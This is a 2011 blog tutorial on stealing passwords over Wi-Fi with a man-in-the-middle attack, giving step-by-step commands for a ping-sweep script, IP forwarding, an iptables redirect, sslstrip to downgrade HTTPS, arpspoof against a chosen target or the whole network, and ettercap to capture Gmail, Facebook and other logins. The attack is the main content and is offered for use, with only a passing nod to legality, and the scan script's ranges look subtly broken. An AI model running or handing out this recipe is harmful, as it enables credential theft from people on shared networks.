Monday, July 25, 2011

Sniffing Passwords Over a Wifi Connection [Linux]

Now here's where some fun stuff starts!
I hope many of you have followed my installing Backtrack 5 guide and read up on what ARP is as well as basic Linux commands so you can follow along easily; if not, go read those now!

What you'll need for this tutorial:

If you don't have any of these, follow the links and set up your system before continuing.

Okay, so what we're doing today is using a few programs to sniff passwords over a network and redirect secure HTTPS connections to non-secure HTTP connections to help us get even more passwords.
I've successfully gotten passwords and user names from Gmail, Facebook, Ureddit, Reddit, and Youtube; but all sites should work.

Be warned, this is a beta post so it will be quite simple and unexplained, so it might be hard to understand for the newer Netsec and Linux users. I'll try to make it as easy to understand as possible in the future.

Lets begin:
  • First, we need to figure out the IP address of the user we want to sniff, and the gateway IP (usually 192.168.0.1 or 192.168.1.1 depending on the network)
    • You should have SOME experience with finding users on a network, but if you don't, you can use a program that comes on Backtrack 5 called "Kismet" to identify users, or copy and paste a hand-written script that I created:

      #!/bin/sh

      echo Computers connected to your network: for dom in {0..1};do #for loop for the domain
      for ip in {0..1};do #for loop for the inner IP

      ping -c 1 192.168.$dom.$ip >>ips.tmp & #pings each IP in range and places them in "ips.tmp"

      done
       #finishes first for loop
      done
       #finishes second for loop
      cat ips.tmp |grep "bytes from" |cut -d" " -f4 |cut -d: -f1 >>ips2.tmp #places specific pinged information into "ips2.tmp"

      cat ips2.tmp #outputs that information

      rm ips.tmp #cleans up temp files

      rm ips2.tmp  #cleans up temp files


      Copy this into a file called "pingscan.sh" and run the command "chmod 775 pingscan.sh"
      Then you can run it with the command "./pingscan.sh" and it should output all connected IPs. The first one (lowest number at the end, such as 192.168.0.1) is the gateway, so remember what number that is.
      You can figure out what yours is by doing our good old friend "ifconfig" and looking at your IP address. You can then figure out which ones are other computers and choose which one you wish to directly sniff.
       This is a simple script that I wrote to ping nodes in your network and you can further add more to it by nmapping said nodes. I will write a post soon about this script and we will add more cool and interesting features to it to suit our needs. 
  • What we have to do is flip our computer into "forwarding" mode which allows us to forward packets along to other computers. Issue the command: "echo 1 > /proc/sys/net/ipv4/ip_forward" which places "1" (true or allow in computer language) into the file "ip_forward" with the ">" operator.

  • Next, we have to set up our "iptables" to redirect HTTP (normal) traffic to our program sslstrip.
     Issue the command "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666"

     I'm using the port 666 because it's easy to remember, but you can use any port that isn't already being used. You probably already know that port 80 is for HTTP traffic, so you can understand why the "destination port" is that. I'll explain the rest later, so don't worry if it doesn't make sense, just check back later!

  • Now we have to run SSLStrip to strip any HTTPS connections and redirect them to HTTP (unsecure) connections. The name SSLStrip is quite perfect, eh?

     To start SSLStrip on my computer, I have to navigate to the SSLStrip folder with the command "cd /pentest/web/sslstrip" first, then issue the command "python sslstrip.py -l 666" to run the program.
    This runs the python script file that starts the program. Python is a scripting language like Perl or Ruby and we will learn about it more in the future. If you're interested in Netsec and want to learn a programming language on your own, definitely check out Python and Perl to start.

    Don't close this terminal.

  • We have to ARP spoof or ARP poison our target computer. We learned about ARP here, and if you haven't read it already, go do so before continuing.
    Open a new terminal now for our ARP spoofing, and run the command:
    "arpspoof -i [your interface] -t [target computer ip address such as 192.168.0.111] [gateway ip address such as 192.168.0.1]

     When I'm arp-spoofing my computer from my laptop, my command is "arpspoof -i wlan0 -t 192.168.0.111 192.168.0.1"

    If you want to arp-spoof the ENTIRE network, issue the command "arpspoof -i [interface] [gateway IP].
    Thanks to Volvox for the above hint, but watch out, because if your computer cant handle all the redirecting the network requires, it will DoS (denial of service) the network.

    Don't close this terminal.

  •  Now open another terminal and lets start Ettercap! We will be using it in text mode today because I personally like it better (it feels less script-kiddie like and easier to navigate/issue commands).

    Run the command "ettercap -m [any_file_name.txt] -Tq -i [interface]" and a text interface will come up telling you a bunch of information (I'll post what mine looks like soon).

    I forgot to mention, to enable on the Ettercap terminal interface, you have to push the space-bar to show the packets coming in... do this and then if there's any navigation on the target computer, you should see the packets start appearing rapidly across your screen.
    Hopefully you're doing this legally on your own network so you can test this out... Open up a browser in your target computer and go to mail.google.com and try to log in. It should redirect you to the HTTP version (but to a normal person, this wont be noticable). Log in with your credentials and you should see something pop up on your Ettercap that looks like a packet from gmail. If it's scrolling too fast (which happens), then don't worry, I'll show you how to open up your file.

  • Open a new terminal while Ettercap is running (don't close it!) and issue the command "cat [your_file_name.txt]"
     Now you can see all the information that was printed at first, and at the bottom there should be some sniffed data if all went well (I'll post a screen-shot later).
    Lets clean this up a bit. Issue the command "cat [your_file_name.txt] |grep USER |cut -d" " -f3-12"
    The quotation marks after the d should be normal, but of course the ones surrounding the entire command are not.
    You should see your data cleaned up quite a bit. I'll run through what that command did later, but I hope you understand some of this for now.
Again, this is a first beta post that I just wanted to get out; I'll be updating it frequently with more information and work-arounds so don't worry if it's not working right away! Post below if you have any issues so I can add it in, too! 

No comments:

Post a Comment